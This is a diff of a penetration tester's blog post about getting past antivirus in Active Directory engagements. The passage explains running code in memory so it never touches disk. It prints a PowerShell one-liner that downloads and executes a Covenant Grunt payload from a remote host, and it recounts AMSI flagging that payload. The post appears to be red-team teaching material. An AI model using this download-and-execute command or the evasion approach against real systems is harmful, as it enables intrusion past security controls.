LuemmelSec/LuemmelSec.github.io/_posts/2021-01-16-Circumventing-Countermeasures-In-AD.md

 ### Not touching the disk

-Another approach is to try to not touch the disk with our malicious content, so that traditional AV is not able to catch us when reading from or writing to disk.
+Another approach is to try to not touch the disk with our malicious content, so that traditional AV is not able to catch us when reading or writing data.
 The most well known technique to me is to use PowerShell´s Invoke Expression feature.
 It will allow you to download a script from a remote source and execute it in memory.
 ```
 iex(new-object net.webclient).downloadstring('http://10.55.0.30/grunt.ps1')
 ```

-Another possibility is to use [Invoke-SharpLoader](https://github.com/S3cur3Th1sSh1t/Invoke-SharpLoader) from - *who would have thought it* - S3cur3Th1sSh1t.
+Another possibility is to use [Invoke-SharpLoader](https://github.com/S3cur3Th1sSh1t/Invoke-SharpLoader) from - *who would have thought it* - S3cur3Th1sSh1t, to load and execute C# directly into memory.

 Okay so let´s bypass Defender by not touching the disk and put our default Grunt payload directly into memory:

 ![broken]({{ site.baseurl }}/images/2021-16-01/ASMI_catch.png "AMSI Catch")

-Fuck!
+*Fuck!
 Something went wrong.
-Looks like we got catched by AMSI which detected a Covenant payload.
+Looks like we got catched by AMSI which detected a Covenant payload.*

 We bypassed the signature based part of Defender for the filesystem stuff, but AMSI checked our script when we loaded it to memory, handed it over to Defender who then found the suspicious strings, flagging it as malicious.